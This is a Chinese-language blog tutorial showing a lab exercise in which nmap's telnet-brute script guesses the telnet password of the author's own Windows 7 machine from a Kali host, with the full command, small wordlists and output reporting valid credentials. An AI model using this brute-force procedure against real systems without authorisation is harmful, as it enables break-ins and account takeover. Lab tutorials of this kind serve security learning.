• 【20171115中】nmap 使用脚本爆破telnet密码


      今天老黑走出了低谷,设置了惩罚机制后效率提升了很多,现在写一个使用nmap检测目标主机漏洞和利用漏洞的文章,话不多说,直接开始!

    0x01:环境介绍

      主机A:系统 - kali2017,IP - 192.168.1.104

      主机B:系统 - win7x64,IP - 192.168.1.103

      使用主机A扫描并攻入主机B

    0x02:确认主机B开启了telnet的23端口

      主机B没有开启,我自己开启一下。

      s1:控制面板 -> 程序 -> 打开或关闭windows程序 -> 选中下图选项框,点击确认后重启系统。

      s2:确认计算机telnet服务是否已经开启。打开计算机右击 -> 管理 -> 服务和应用程序 -> 服务 -> 找到Telnet服务,并将其开启服务和设置自动

    0x03:在主机A扫描确认主机B是否开启了23端口

      

    0x04:进行爆破

      s1:参考官网了解,爆破命令如下

    nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s <target>

      s2:制造自己的myusers.lst和mypwds.lst

        老黑将自己的账号AAAA放在myusers.lst中,如下:

        

    AAAA
    AA22
    ASDFSA
    SDSDD
    

        将自己的密码BBBB放在mypwds.lst中,如下:

    BBBB
    BB23
    DFASDFA
    SADFAA

        根据主机A的环境,调整命令,如下:

    nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103

      s3:执行命令,等待结果

    root@l:~# nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103
    
    Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-15 18:18 CST
    Nmap scan report for promote.cache-dns.local (192.168.1.103)
    Host is up (0.091s latency).
    
    PORT   STATE SERVICE
    23/tcp open  telnet
    | telnet-brute: 
    |   Accounts: 
    |     AAAA:BBBB - Valid credentials
    |_  Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0
    MAC Address: XXXXXXXXXXXXX (xxxxxxxxxxxx.)
    
    Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds
    

      

    0x05:telnet登陆主机B,WELL DONE!

  • 相关阅读:
    qemu -net tap配置上网
    qemu所支持的网卡
    linux fdisk
    linux dd命令
    busybox inittab
    busybox相关的工具
    mongoDB全文索引
    MySql 内存表使用
    oracle数据迁移到mysql
    centOS下安装mysql workbench详细步骤
  • 原文地址:https://www.cnblogs.com/heijuelou/p/7840371.html
Copyright © 2020-2023  润新知